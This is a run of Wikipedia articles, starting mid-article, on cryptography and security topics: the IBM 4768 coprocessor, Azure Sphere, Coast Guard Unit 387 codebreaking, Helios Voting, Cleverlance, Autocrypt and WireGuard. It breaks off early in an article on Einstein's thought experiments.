keystore file or in application memory, encrypted under the master key of that coprocessor. Any coprocessor with an identical master key can use those keys. Performance benefits include the incorporation of elliptic curve cryptography (ECC) and format preserving encryption (FPE) in the hardware. IBM supports the 4768 on certain IBM Z mainframes as Crypto Express6S (CEX6S) - feature code 0893. The 4768 / CEX6S is part of IBM's support for pervasive encryption and drive to encrypt all data. In September 2019 the successor IBM 4769 was announced. References External links These links point to various relevant cryptographic standards. ISO 13491 - Secure Cryptographic Devices: https://www.iso.org/standard/61137.html ISO 9564 - PIN security: https://www.iso.org/standard/68669.html ANSI X9.24 Part 1: Key Management using Symmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-1-2017 ANSI X9.24 Part 2: Key Management using Asymmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-2-2016 FIPS 140-2: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf Payment Card Industry (PCI) PIN Transaction Security (PTS): Hardware Security Module (HSM) Modular Security Requirements: search this site: https://www.pcisecuritystandards.org/document_library Cryptographic hardware Banking technology 4768
57165746
https://en.wikipedia.org/wiki/Azure%20Sphere
Azure Sphere
Azure Sphere are services and products from Microsoft that allows vendors of Internet of Things devices to increase security by combining a specific system on a chip, Azure Sphere OS and an Azure-based cloud environment for continuous monitoring. Azure Sphere OS The Azure Sphere OS is a custom Linux-based microcontroller operating system created by Microsoft to run on an Azure Sphere-certified chip and to connect to the Azure Sphere Security Service. The Azure Sphere OS provides a platform for Internet of Things application development, including both high-level applications and real-time capable applications. It is the first operating system running a Linux kernel that Microsoft has publicly released and the second Unix-like operating system that the company has developed for external (public) users, the other being Xenix. Azure Sphere Security Service The Azure Sphere Security Service, sometimes referred to as AS3, is a cloud-based service that enables maintenance, updates, and control for Azure Sphere-certified chips. The Azure Sphere Security Service establishes a secure connection between a device and the internet and/or cloud services and ensures secure boot. The primary purpose of contact between an Azure Sphere device and the Azure Sphere Security Service is to authenticate the device identity, ensure the integrity and trust of the system software, and to certify that the device is running a trusted code base. The service also provides the secure channel used by Microsoft to automatically download and install Azure Sphere OS updates and customer application updates to deployed devices. Azure Sphere chips and hardware Azure Sphere-certified chips and hardware support two general implementation categories: greenfield and brownfield. Greenfield implementation involves designing and building new IoT devices with an Azure Sphere-certified chip. Azure Sphere-certified chips are currently produced by MediaTek. In June 2019, NXP announced plans to produce a line of Azure Sphere-certified chips. In October 2019, Qualcomm announced plans to produce the first Azure Sphere-certified chips with cellular capabilities. Brownfield implementation involves the use of an Azure Sphere guardian device to securely connect an existing device to the internet. Azure Sphere guardian modules are currently produced by Avnet. MediaTek 3620 MT3620 is the first Azure Sphere-certified chip and includes an ARM Cortex-A7 processor (500 MHz), two ARM Cortex-M4F I/O subsystems (200 MHz), 5x UART/I2C/SPI, 2x I2S, 8x ADC, up to 12 PWM counters and up to 72x GPIO, and Wi-Fi capability. MT3620 contains the Microsoft Pluton security subsystem with a dedicated ARM Cortext-M4F core that handles secure boot and secure system operation. Azure Sphere Hardware Azure Sphere-certified chips can be purchased in several different hardware configurations produced by Microsoft partners. Modules Avnet Wi-Fi Module AI-Link Wi-Fi Module USI Dual Band Wi-Fi Module Development kits Avnet MT3620 Starter Kit Seeed MT3620 Dev Board Seeed MT3620 Mini Dev Board Guardian devices Avnet Guardian Module Azure Sphere Guardian module An Azure Sphere Guardian module is external, add-on hardware that incorporates an Azure Sphere-certified chip and can be used to securely connect an existing device to the internet. In addition to an Azure-Sphere certified chip, an Azure Sphere Guardian module includes the Azure Sphere OS and the Azure Sphere Security Service. A guardian module is a method of implementing secure connectivity for existing devices without exposing those devices to the internet. The guardian module can be connected to a device through an existing peripheral on the device and is then connected to the internet through Wi-Fi or Ethernet. The device itself is not connected directly to the network. Microsoft Pluton Pluton is a Microsoft-designed security subsystem that implements a hardware-based root of trust for Azure Sphere. It includes a security processor core, cryptographic engines, a hardware random number generator, public/private key generation, asymmetric and symmetric encryption, support for elliptic curve digital signature algorithm (ECDSA) verification for secured boot, and measured boot in silicon to support remote attestation with a cloud service, and various tampering counter-measures. Application development The Linux-based Azure Sphere OS provides a platform for developers to write applications that use peripherals on the Azure Sphere chip. Applications can run on either the A7 core with access to external communications or as real-time capable apps on one of the M4 processors. Real-time capable applications can run on either bare metal or with a real-time operating system (RTOS). Developer applications can be distributed to Azure Sphere devices through the same secure mechanism as the Azure Sphere OS updates. Timeline The following is a list of announcements and releases from Microsoft around Azure Sphere. See also Windows Subsystem for Linux Xenix Windows IoT References External links 2018 software ARM operating systems Computer-related introductions in 2018 Computing platforms Embedded operating systems Linux Microcontroller software Microsoft hardware Microsoft operating systems
57166533
https://en.wikipedia.org/wiki/United%20States%20Coast%20Guard%20Unit%20387%20Cryptanalysis%20Unit
United States Coast Guard Unit 387 Cryptanalysis Unit
The United States Coast Guard Unit 387 became the official cryptanalytic unit of the Coast Guard collecting communications intelligence for Coast Guard, U.S. Department of Defense, and the Federal Bureau of Investigation (FBI) in 1931. Prior to becoming official, the Unit worked under the U.S. Treasury Department intercepting communications during the prohibition. The Unit was briefly absorbed into the U.S. Navy in 1941 during World War II (WWII) before returning to be a Coast Guard unit again following the war. The Unit contributed to significant success in deciphering rum runner codes during the prohibition and later Axis agent codes during WWII, leading to the breaking of several code systems including the Green and Red Enigma machines. The Rise of Unit 387 The U.S. Coast Guard (USCG) Unit 387 was established in the 1920s as a small embedded unit of the USCG. It did not become an officially named unit until 1931, when it was named the USCG Unit 387 by Elizebeth Friedman. The United States government established this code-communications unit to intercept ship communications and track down prohibition law breakers because “rum runners” were increasingly using radio and code systems for communication. There was an increasing need for code-breaking and encoding capabilities to counter the rum runners, as they were sophisticated criminals attempting to intercept government communications as well. By 1927, the USCG intercepted hundreds of messages but lacked the resources and personnel needed for codebreaking. Therefore, the U.S. Treasury Department appointed William and Elizebeth Friedman, a couple famous for cryptology, to create new code systems for the USCG operations against the prohibition violators and to decrypt the messages accumulating. The Friedmans were famous cryptographers with expansive careers in Washington DC for the U.S. army, navy, Treasury and Justice Departments throughout WWI and WWII. In 1927, the rum runners commonly used two coding systems, switching them every six months. By mid-1930, rum runners significantly increased their coding abilities having virtually every rum boat use its own coding system. From April 1929 to January 1930, the San Francisco intelligence collection station alone intercepted 3,300 messages and discovered approximately 50 distinct secret coding systems which varied with up to five subsystems of codes and ciphers used by the rum runners. Between 1927 and 1928, the USCG unit successfully reduced the flow of illegal smuggling by 60 percent, from 14 million gallons of liquor to 5 million, by breaking these coding systems. An example of their successes took place on 29 September 1930, when the unit intercepted a message sent by a shore station in Vancouver, British Columbia intended for a rum runner operating in the Gulf of Mexico. The coded message contained five columns of 3-4 words each. When decoded by the unit, the message read “Henry cannot take goods now. Proceed 50 miles east Briton Island and give to Louis when he comes.” Their successes were in part due to the USCG interception and decryption capabilities, and their innovation in fusing together all-source intelligence such as human intelligence (HUMINT), imagery intelligence (IMINT) and communications intelligence (COMINT). The cryptanalytic unit used USCG patrol boats with high-frequency direction finding gear (HFDF, also nicknamed “Huff Duff”) created by William Friedman, and Elizebeth's code-breaking expertise to locate illicit radio stations and rum runners at sea. The USCG today credits these operations as the first tactical law enforcement use of COMINT in U.S. history. Elizebeth alone decrypted approximately 12,000 messages between rum runner networks over a three-year time span. The unit decrypted a total of approximately 25,000 messages per year during prohibition. Following this success, the USCG requested that Elizebeth contribute more to their expanding operations, including codebreaking smugglers’ communications and aiding USCG partners such as the Customs Bureau and Secret Service. The U.S. Treasury Department officially transferred her to the Coast Guard in June 1931 to work as a cryptanalyst and to build up a new, official cryptanalytic unit within the Coast Guard. She began hiring and training young professionals to be cryptanalysts, women with expertise in stenography and men with backgrounds in physics, chemistry, or math. These young professionals trained in cryptanalysis officially became USCG Unit 387. The successful techniques in codebreaking and use of HFDF technology were later used by the unit in its clandestine operations in WWII, collecting information in Central and South America. Unit 387 Involvement in WWII Following the repeal of the prohibition, the USCG Unit 387 continued intercepting communications to counter smugglers attempting to evade liquor taxes and traffic narcotics. As the unit intercepted these communications, they discovered similar message traffic that, once decrypted, suggested non-neutral activities between Axis agents and Latin America. As worldwide aggression intensified in the 1930s, the U.S. Treasury Department requested Elizebeth Friedman and Unit 387 to officially shift focus from counter-narcotics to non-neutral communications in March 1938. The U.S. Treasury Department expanded the unit's functions to include monitoring ships and communications between Germany, Italy, and Central and South America. The U.S. Navy absorbed the USCG Unit 387 under the name OP-20-GU, and later OP-G-70, in 1941. The main responsibilities included monitoring worldwide clandestine radio intelligence and COMINT collection. Although the unit was unofficially conducting clandestine operations, the Coast Guard was officially assigned to clandestine operations outside of the Western Hemisphere, and within the Western Hemisphere in joint operations with the FBI on 30 June 1942. The unit discovered that several commercial firms in Mexico and Central and South America were encrypting communications with Germany, breaking the neutrality laws. Throughout WWII, the unit used HFDF technology to intercept approximately 10,000 enemy communications from 65 German clandestine networks and played a key role in cracking the “Enigma G” Code of the Green Enigma, the Red Enigma, the Berlin-Madrid Machine, and the Hamburg-Bordeaux Stecker codes. Their HFDF stations expanded to cover the United States with 20 primary stations, nine secondary stations, six contributory stations, and five Coast Guard radio stations. The USCG also had Cutters, trucks, briefcases, and handbags with HFDF technology inside to track “wildcat” stations across the US. The FBI Director J. Edgar Hoover believed that intercepting messages of German agents in Latin America would be instrumental in eliminating Nazi spy networks in the US. Therefore, the Coast Guard Unit 387 also aided the FBI in intercepting and decrypting messages beginning around May 1940. Unit 387 Efforts in Deciphering Codes In January 1940, the USCG Unit 387 intercepted suspicious circuits which transmitted one to five messages a day. Initially, the operators did not know the method or language of the enciphered text, which delayed success in attempts to solve the message codes. Once the Coast Guard intercepted sixty to seventy codes, it became apparent that the language used in the enciphered text was German and the encryption method used was likely a word separator. The operators knew the messages were in flush depth, a ciphering term which means the encrypted messages were correctly superimposed, each starting at the same point in the key. They discovered that the intercepted messages were likely enciphered using a commercial Enigma machine due to the indicators of language used and the observation that “no plain letter was represented by itself in ciphered text.” The Coast Guard had a copy of the commercial version Enigma as well as manufacturer's instructions for use. The instructions hinted at the common practice of using “X” as a separator of words and using numbers to represent their equivalent letters as displayed on the keyboard of the Enigma machine. An example of this number-word pairing is “1-Q, 2-W, 3-E, 4-R, 5-T.” After discovering the first 32 alphabets, Unit 387 created a technique for solving the reflector and successive wheels of the commercial Enigma machine, which led them to have a complete solution to all wiring of that machine. In 1940, the Coast Guard intercepted messages that were transmitted over a Mexico-Nauen circuit. When decrypted, the messages contained a series of numbers that represented pages and line numbers of a dictionary. The cryptanalytic unit discovered that two number series repeated at the end of several messages and after some experimentation, they realized the number series spelled out “Berlin” and “Bremen.” The unit used these values for other messages intercepted and deciphered additional words: two German Agent's names “Max” and “Glenn,” several ship names, departure dates, and types of cargo. The unit was able to figure out the alphabet and associated numbers for the messages sent over this circuit. Eventually the unit also located the dictionary used to encode the messages, titled “LANGENSCHEIDTS TASCHENWOERTERBUCH der spanischen und deutschen Sprache.” They were able to decode all other messages sent using the dictionary code following this discovery. Between 1940 and 1942, the Coast Guard intercepted messages between Latin America and Germany most commonly using the Rudolph Mosse code and passing “to and from SUDAMERO and SUDAMERIAT, Mexico; SUDAMERIAT, Hamburg; and SUDAMVORST, SUDAMERO, and SUDAMERIAT, Berlin.” The Rudolph Mosse is a type of code with letters of each code group transposed and a fixed alphabetic substitution for each of the last two letters. These messages became known as the OPALU messages. Axis agents would send the indicator “OPALU” as the first group of letters before sending the message. In 1942, Unit 387, with the help of the Federal Communications Commission (FCC) and the Radio Security Service (RSS) intercepted messages sent between stations called TQI2 and TIM2. They believed TQI2 was in Europe and TIM2 was in South America. Between October and December that year, the unit intercepted 28 messages. Applying the lessons learned from solving the commercial Enigma machine and the new techniques passed on by the British, the unit was able to solve the Green Enigma machine encrypting these messages. The British had determined wheel motion patterns used by many of the Enigma machines by German agents in Europe. Since Unit 387 was able to decrypt several messages between TQI2 and TIM2, text revealing the messages were communications between Berlin and Argentina, they were able to apply the British techniques to determine this new machine's wheel motion patterns and the monthly ring settings the agents used to encrypt the messages. The unit had an idea of the wheel patterns and monthly ring settings by January 1943, which was confirmed by messages sent between Berlin and Argentina in June and July that year. Following these messages, they knew they had cracked the Green Enigma machine. Following the success of solving the Green Enigma, the unit intercepted more communications between Argentina and Berlin encrypted on the Green Enigma on 4 November 1943. Using the known keys, the unit revealed the following message: “THE TRUNK TRANSMITTER WITH ACCESSORIES AND ENIGMA ARRIVED VIA RED. THANK YOU VERY MUCH. FROM OUR MESSAGE 150 WE SHALL ENCIPHER WITH THE NEW ENIGMA. WE SHALL GIVE THE OLD DEVICE TO GREEN. PLEASE ACKNOWLEDGE BY RETURN MESSAGE WITH NEW ENIGMA.” Messages were then sent from Berlin to Argentina confirming the arrival of the new Enigma machine. The Axis agents encoded these messages using the Kryha machine, of which the Coast Guard already had the keys. After reading the series of messages sent by German agents from Berlin to Latin America talking of new “Red” section keys, the unit decrypted the Red Enigma machine using similar methods. See also Signals intelligence US Army SIS OP-20-G References Cryptography organizations United States Coast Guard Defunct United States intelligence agencies Signals intelligence agencies Signals intelligence of World War II
57205678
https://en.wikipedia.org/wiki/Helios%20Voting
Helios Voting
Helios Voting is an open-source, web-based electronic voting system. Users can vote in elections and users can create elections. Anyone can cast a ballot; however, for the final vote to be counted, the voter's identification must be verified. Helios uses homomorphic encryption to ensure ballot secrecy. It was created by Ben Adida, a software engineer involved in other projects such Creative Commons and Mozilla Persona. Characteristic Helios allows registered users to create elections. Each account requires an email address, name, and a password. The registered user can then create an election by specifying a name and time period. The user who created the election is known as the administrator of the election. Once an election is created, Helios provides a public key to the administrator. The administrator prepares the ballot and creates a voter roll—these can be edited at any time before voting starts. The administrator freezes the election when the election is ready for voters to cast ballots. When the election is frozen, no changes can be made to the ballot, voter roll, or election time frame. Source code The front-end browser code is written in both JavaScript and HTML, while the back-end server code is written in Python. The Ballot Preparation System (BPS) guides voters through the ballot and records their choices. The process to create the ballot and process the votes is based on Benaloh's Simple Verifiable Voting Protocol. Both frontend and backend are free software. The backend is released under the Apache 2.0 license. while the frontend is released under the GNU GPL v3+. Voting process A voter, from the voting roll created by the administrator, receives an email with the voter's username, a random password for that specific election, a URL to the voting booth, and an SHA-1 hash of the election parameters. The voter follows the link in the email and begins the voting process. Once the voter finishes and has reviewed the ballot, the voter seals the ballot which triggers Helios to encrypt it and display a ciphertext. At this point the voter can either audit or cast the ballot. Auditing the ballot allows the voter to verify that the ciphertext is correct. Once ballot auditing is complete, that ballot is discarded (to provided some protection against vote-buying and coercion) and a new ballot is constructed. When the voter is ready to cast their ballot, they must provide their login information. Helios authenticates the voter's identity and the ballot is cast. All votes are posted to a public online bulletin board which displays either a voter name or a voter ID number with the encrypted vote. Tallying process After an election ended, the Helios 1.0 system shuffled the ballots, decrypted all the votes, and made the shuffle publicly accessible for interested parties to audit. Auditing allowed anyone to verify that the shuffle is correct. Once a reasonable amount of time for auditing had passed, Helios decrypted the ballots and tallied the votes. Anyone could download the election data to verify that the shuffle, decryptions, and tally were correct. Helios 2.0, designed in 2008 and currently in use, abandoned the shuffling and switched to a homomorphic encryption scheme proposed by Cramer, Gennaro and Schoenmakers. System limitations The Helios platform is intended to be utilized in low-coercive, small scale environments such as university student governments. The following limitations are known. Privacy The centralized server must be trusted not to violate ballot secrecy, this limitation can mitigated against by distributing trust amongst several stakeholders. Coercion and vote-buying are only ensured when material used to construct ballots (more precisely, nonces) are unknown to voters, e.g., when trusted devices are used to construct ballots. Verifiability The ballot auditing/reconstruction device must be trusted to ensure successful ballot auditing (also known as cast-as-intended verifiability), this limitation can be mitigated against by distributing auditing checks amongst several devices, only one of which must be trusted. Security In 2010 researchers identified a ballot secrecy vulnerability. In 2011 and 2016 researchers identified cross-site scripting vulnerabilities. The first endangers sessions of administrators and was promptly patched. For the second, if the attacker is able to get a voter to click a specially crafted link, the voter will land on a modified HELIOS page which can violate ballot secrecy or manipulate votes. It is unclear if the vulnerability has been fixed as of 2019. History Adoption Since 2009 the Universite Catholique de Louvain used Helios to elect its university president (of around 25,000 eligible voters, some 5,000 registered and 4,000 voted). In the same year also the Princeton University adopted it to elect student governments. Since 2010, the International Association for Cryptographic Research has used Helios annually to elect board members. In 2014 the Association for Computing Machinery used Helios for their general election. References Free software Electronic voting methods
57218462
https://en.wikipedia.org/wiki/Cleverlance%20Enterprise%20Solutions
Cleverlance Enterprise Solutions
Cleverlance Enterprise Solutions a.s. is an information technologies company with HQ in The Czech Republic and branch offices in Prague, Brno, Bratislava and Bremen. Cleverlance develops its own products, integrates IT platforms and provides analytical services as well as testing of software. These services are offered by Cleverlance to clients ranging from financial institutions, through telecommunications to the power or automotive industries. Since the 30th of October 2017, Cleverlance became a member of the Association of Virtual and Augmented Reality and is currently working on several applications of VR and AR. History Origins Cleverlance was founded in 1999, in Czechia, as a company which specialized in developing for the Java EE platform. The founding members were Jakub Dosoudil, Jan Šeda a Dobromil Podpěra. Jan Šeda later sold his share in the company to the other founders. In 2004, Cleverlance Group was founded. Death of Dosoudil During the 2004 Christmas holidays, one of the founding members of Cleverlance, Jakub Dosoudil (27 years old at the time), went to Thailand with his girlfriend Michaela Beránková (25 years old at the time, also working for Cleverlance). They died in the Indian Ocean tsunami, which killed almost 230 000 people. The rest of the employees and owners of Cleverlance were trying to find the couple, along with their families, after Dosoudil and Beránková have been reported missing. Their bodies were found and identified in 2005. The deaths of Dosoudil and Beránková were a huge loss for the company and created a very chaotic situation for the company overall. Later development In 2017, the annual revenue of the company crossed 1 billion Czech crowns. In 2019 the new majority owner became the KKCG group. Invinit Group Invinit Group (formerly known as Cleverlance Group) is a family of different IT companies, connected to the founding firm Cleverlance and dealing with many different aspects of information technologies. Apart from Cleverlance Enterprise Solutions, the companies include: AEC AEC is a Czech IT company, which was created in 1991 and deals with various facets of cyber security. AEC became a member of Cleverlance Group in 2007, through an acquisition agreement between the companies. Eicero Eicero became a member of Cleverlance Group in 2010. The company deals in the complex diagnostics of photovoltaic power stations and the elimination of PID (Potential-induced degradation), which causes lowering of output of a given power station. The main product of Eicero is PID Doctor, a device regenerates photovoltaic panels that were damaged by PID and restores their performance. TrustPort TrustPort is a provider and developer of computer safety solutions. TrustPort products are based on antivirus and encryption technologies, anti-spam methods and anomaly behavior monitoring AI techniques. TrustPort became member of the group in March 2008. The company was created as an independent subject within Cleverlance Group after the acquisition of AEC, from which TrustPort became independent. IT education Cleverlance periodically holds so called Academies, in which members of the public can learn about specific IT topics and be granted a certificate after going through this intense crash course. After the course is completed, the best scoring people are offered a job position in Cleverlance. Most often held Academy is the Testing Clever Academy, designed to teach attendees the ins and outs of IT testing within a single week and Testing Java Academy, focused on developers early in their career. Cleverlance also organizes education academies for the .NET and database technologies. Name of the company The name is a combination the words „clever“ and „lance“, which both have connotations of sharpness. The name was thought up by the founding member Jakub Dosoudil, while on vacation in Mexico. References Information technology companies of the Czech Republic
57248228
https://en.wikipedia.org/wiki/Autocrypt
Autocrypt
Autocrypt is a cryptographic protocol for email clients aiming to simplify key exchange and enabling encryption. Version 1.0 of the Autocrypt specification was released in December 2017 and makes no attempt to protect against MITM attacks. It is implemented on top of OpenPGP replacing its complex key management by fully automated unsecured exchange of cryptographic keys between peers . Method Autocrypt-capable email clients transparently negotiate encryption capabilities and preferences and exchange keys between users alongside sending regular emails. This is done by including the key material and encryption preferences in the header of each email, which allows encrypting any message to a contact who has previously sent the user email. This information is not signed or verified in any way even if the actual message is encrypted and verified. No support is required from email providers other than preserving and not manipulating the Autocrypt specific header fields. When a message is encrypted to a group of receivers, keys are also automatically sent to all receivers in this group. This ensures that a reply to a message can be encrypted without any further complications or work by the user. Security model Autocrypt is guided by the idea of opportunistic security from RFC 7435 but implementing something much less secure than a trust on first use (TOFU) model. Encryption of messages between Autocrypt-capable clients can be enabled without further need of user interaction. Traditional OpenPGP applications should display a noticeable warning if keys are not verified either manually or by a web of trust method before use. In contrast, Autocrypt completely resigns on any kind of key verification. Key exchange is during the initial handshake and valid or invalid keys of peers may be replaced anytime later without any user interaction or verification. This makes it very easy to exchange new key(s) if a user loses access to the key but also makes the protocol much more susceptible to man-in-the-middle attacks than clean TOFU. The underlying OpenPGP implementation makes it often possible for the user to perform manual out of band key verification, however by design users are never alerted if Autocrypt changed the keys of peers. Autocrypt tries to maximize the possible opportunities for encryption, but is not aggressive about encrypting messages at all possible opportunities. Instead, encryption is only enabled by default if all communicating parties consent, allowing users to make themselves available for encrypted communication without getting in the way of their established workflows. Man-in-the-middle attacks are not preventable in this security model, which is controversial. Any attacker who can send emails with forged sender-address can cause encryption keys to be replaced by keys of his choice and/or deliberately turn off encryption. Technical details Autocrypt uses the established OpenPGP specification as its underlying data format. Messages are encrypted using AES and RSA keys, with a recommended RSA key length of 3072 bits. These mechanisms are chosen for maximum compatibility with existing OpenPGP implementations. There are plans for moving to smaller Elliptic-curve keys when support is more widely available. Support Kontact since version 21.04. No longer functional: Thunderbird extension Enigmail since version 2.0. Delta Chat messenger from Version 0.9.2. K-9 Mail Android mail-app has support since Version 5.400 (reportedly broken until version 5.717). No longer functional: Autocrypt extension in Thunderbird. The German email provider Posteo also supports Autocrypt, by additionally cryptographically signing outbound Autocrypt metadata via DKIM. The popular free email client Thunderbird refuses to adopt the standard and its whole approach of fully automated E2E email encryption. Further reading Autocrypt - in: Bertram, Linda A. / Dooble, Gunther van / et al. (Eds.): Nomenclatura: Encyclopedia of modern Cryptography and Internet Security - From AutoCrypt and Exponential Encryption to Zero-Knowledge-Proof Keys, 2019, . OpenPGP Transformation of Cryptography: Fundamental concepts of Encryption The New Era Of Exponential Encryption: - Beyond Cryptographic Routing External links Autocrypt Website (engl.) Autocrypt 1.0 Spezifikation (engl.) References Cryptographic software Security
57257634
https://en.wikipedia.org/wiki/WireGuard
WireGuard
WireGuard is a communication protocol and free and open-source software that implements encrypted virtual private networks (VPNs), and was designed with the goals of ease of use, high speed performance, and low attack surface. It aims for better performance and more power than IPsec and OpenVPN, two common tunneling protocols. The WireGuard protocol passes traffic over UDP. In March 2020, the Linux version of the software reached a stable production release and was incorporated into the Linux 5.6 kernel, and backported to earlier Linux kernels in some Linux distributions. The Linux kernel components are licensed under the GNU General Public License (GPL) version 2; other implementations are under GPLv2 or other free/open-source licenses. Protocol WireGuard uses the following: Curve25519 for key exchange ChaCha20 for symmetric encryption Poly1305 for message authentication codes SipHash for hashtable keys BLAKE2s for cryptographic hash function UDP-based only In May 2019, researchers from INRIA published a machine-checked proof of WireGuard, produced using the CryptoVerif proof assistant. Optional Pre-shared Symmetric Key Mode WireGuard supports pre-shared symmetric key mode, which provides an additional layer of symmetric encryption to mitigate any future advances in quantum computing. The risk being that traffic is stored until quantum computers are capable of breaking Curve25519; at which point traffic could be decrypted. Pre-shared keys are "usually troublesome from a key management perspective and might be more likely stolen", but in the shorter term, if the symmetric key is compromised, the Curve25519 keys still provide more than sufficient protection. Networking WireGuard only uses UDP and thus does not work in networks that block UDP traffic. This is unlike alternatives like OpenVPN because of the many disadvantages of TCP-over-TCP routing. WireGuard fully supports IPv6, both inside and outside of tunnel. It supports only layer 3 for both IPv4 and IPv6 and can encapsulate v4-in-v6 and vice versa. WireGuard supports multiple topologies: Point-to-point Star (server/client) A client endpoint does not have to be defined before the client starts sending data. Client endpoints can be statically predefined. Mesh Extensibility Excluding such complex features from the minimal core codebase improves its stability and security. For ensuring security, WireGuard restricts the options for implementing cryptographic controls, limits the choices for key exchange processes, and maps algorithms to a small subset of modern cryptographic primitives. If a flaw is found in any of the primitives, a new version can be released that resolves the issue. Also, configuration settings that affect the security of the overall application cannot be modified by unprivileged users. Reception WireGuard aims to provide a simple and effective virtual private network implementation. A 2018 review by Ars Technica observed that popular VPN technologies such as OpenVPN and IPsec are often complex to set up, disconnect easily (in the absence of further configuration), take substantial time to negotiate reconnections, may use outdated ciphers, and have relatively massive code bases of over 400,000 and 600,000 lines of code, respectively, which hinders debugging. WireGuard's design seeks to reduce these issues, aiming to make the tunnel more secure and easier to manage by default. By using versioning of cryptography packages, it focuses on ciphers believed to be among the most secure current encryption methods, and at the time of the Ars Technica review had a codebase of around 4000 lines of kernel code, about 1% of either OpenVPN or IPsec, making security audits easier. WireGuard was praised by Linux kernel creator Linus Torvalds who called it a "work of art" in contrast to OpenVPN and IPsec. Ars Technica reported that in testing, stable tunnels were easily created with WireGuard, compared to alternatives, and commented that it would be "hard to go back" to long reconnection delays, compared to WireGuard's "no nonsense" instant reconnections. Oregon senator Ron Wyden has recommended to the National Institute of Standards and Technology (NIST) that they evaluate WireGuard as a replacement for existing technologies like IPsec and OpenVPN. Availability Implementations Implementations of the WireGuard protocol include: Donenfeld's initial implementation, written in C and Go. Cloudflare's BoringTun, a user space implementation written in Rust. Matt Dunwoodie's implementation for OpenBSD, written in C. Ryota Ozaki's wg(4) implementation, for NetBSD, is written in C. The FreeBSD implementation is written in C and shares most of the data path with the OpenBSD implementation. Native Windows kernel implementation named "wireguard-nt", since August 2021 OPNsense via standard package os-WireGuard pfSense via standard package (pfSense-pkg-WireGuard) (A Netgate-endorsed community package) Linux support User space programs supporting WireGuard include: NetworkManager since version 1.16 systemd since version 237 Intel's ConnMan since version 1.38 IPVanish VPN since version 3.7.4.0 Mozilla VPN (with Mullvad) NOIA Network NordVPN via Nordlynx Veeam Powered Network v2, since May 2019 PiVPN since 17 October 2019 VPN Unlimited since November 2019 Private Internet Access VPN since 10 April 2020 hide.me CLI VPN client since July 20, 2020 Surfshark since October 2020 Mistborn (software) VPN since March 2020 Oracle Linux with "Unbreakable Enterprise Kernel" Release 6 Update 1, since November 2020 oVPN since Feb 2020, roll-out in 2021 Torguard since 2020 Vypr VPN since May 2020 Windscribe in 2020 Trust.zone VPN since February 2021 ProtonVPN since October 2021 History Early snapshots of the code base exist from June 30, 2016. Four early adopters of WireGuard were the VPN service providers Mullvad, AzireVPN, IVPN and cryptostorm. WireGuard has received donations from Mullvad, Private Internet Access, IVPN, the NLnet Foundation and now also from OVPN. the developers of WireGuard advise treating the code and protocol as experimental, and caution that they have not yet achieved a stable release compatible with CVE tracking of any security vulnerabilities that may be discovered. On 9 December 2019, David Miller - primary maintainer of the Linux networking stack - accepted the WireGuard patches into the "net-next" maintainer tree, for inclusion in an upcoming kernel. On 28 January 2020, Linus Torvalds merged David Miller's net-next tree, and WireGuard entered the mainline Linux kernel tree. On 20 March 2020, Debian developers enabled the module build options for WireGuard in their kernel config for the Debian 11 version (testing). On 29 March 2020 WireGuard was incorporated into the Linux 5.6 release tree. The Windows version of the software remains at beta. On 30 March 2020, Android developers added native kernel support for WireGuard in their Generic Kernel Image. On 22 April 2020, NetworkManager developer Beniamino Galvani merged GUI support for WireGuard. On 12 May 2020, Matt Dunwoodie proposed patches for native kernel support of WireGuard in OpenBSD. On 22 June 2020, after the work of Matt Dunwoodie and Jason A. Donenfeld, WireGuard support was imported into OpenBSD. On 23 November 2020, Jason A. Donenfeld released an update of the Windows package improving installation, stability, ARM support, and enterprise features. On 29 November 2020, WireGuard support was imported into the FreeBSD 13 kernel. On 19 January 2021, WireGuard support was added for preview in pfSense Community Edition (CE) 2.5.0 development snapshots. In March 2021, kernel-mode WireGuard support was removed from FreeBSD 13.0, still in testing, after an urgent code cleanup in FreeBSD WireGuard could not be completed quickly. FreeBSD-based pfSense Community Edition (CE) 2.5.0 and pfSense Plus 21.02 removed kernel-based WireGuard as well. In May 2021, WireGuard support was re-introduced back into pfSense CE and pfSense Plus development snapshots as an experimental package written by a member of the pfSense community, Christian McDonald. The WireGuard package for pfSense incorporates the ongoing kernel-mode WireGuard development work by Jason A. Donenfeld that was originally sponsored by Netgate In June 2021, the official package repositories for both pfSense CE 2.5.2 and pfSense Plus 21.05 included the WireGuard package See also Comparison of virtual private network services Secure Shell (SSH), a cryptographic network protocol used to secure services over an unsecured network. Notes References External links Free security software Linux network-related software Tunneling protocols Virtual private networks
57264039
https://en.wikipedia.org/wiki/Einstein%27s%20thought%20experiments
Einstein's thought experiments
A hallmark of Albert Einstein's career was his use of visualized thought experiments () as a fundamental tool for understanding physical issues and for elucidating his concepts to others. Einstein's thought experiments took diverse forms. In his youth, he mentally chased beams of light. For special relativity, he employed moving trains and flashes of lightning to explain his most penetrating insights. For general relativity, he considered a person falling off a roof, accelerating elevators, blind beetles crawling on curved surfaces and the like. In his debates with Niels Bohr on the nature of reality, he proposed imaginary devices intended to show, at least in concept, how the Heisenberg uncertainty principle might be evaded. In a profound contribution to the literature on quantum mechanics, Einstein considered two particles briefly interacting and then flying apart so that their states are correlated, anticipating the phenomenon known as quantum entanglement. Introduction A thought experiment is a logical argument or mental model cast within the context of an imaginary (hypothetical or even counterfactual) scenario. A scientific thought experiment, in particular, may examine the implications of a theory, law, or set of principles with the aid of fictive and/or natural particulars (demons sorting molecules, cats whose lives hinge upon a radioactive disintegration, men in enclosed elevators) in an idealized environment (massless trapdoors, absence of friction). They describe experiments that, except for some specific and necessary idealizations, could conceivably be performed in the real world. As opposed to physical experiments, thought experiments do not report new empirical data. They can only provide conclusions based on deductive or inductive reasoning from their starting assumptions. Thought experiments invoke particulars that are irrelevant to the generality of their conclusions. It is the invocation of these particulars that give thought experiments their experiment-like appearance. A thought experiment can always be reconstructed as a straightforward argument, without the irrelevant particulars. John D. Norton, a well-known philosopher of science, has noted that "a good thought experiment is a good argument; a bad thought experiment is a bad argument." When effectively used, the irrelevant particulars that convert a straightforward argument into a thought experiment can act as "intuition pumps" that stimulate readers' ability to apply their intuitions to their understanding of a scenario. Thought experiments have a long history. Perhaps the best known in the history of modern science is Galileo's demonstration that falling objects must fall at the same rate regardless of their masses. This has sometimes been taken to be an actual physical demonstration, involving his climbing up the Leaning Tower of Pisa and dropping two heavy weights off it. In fact, it was a logical demonstration described by Galileo in Discorsi e dimostrazioni matematiche 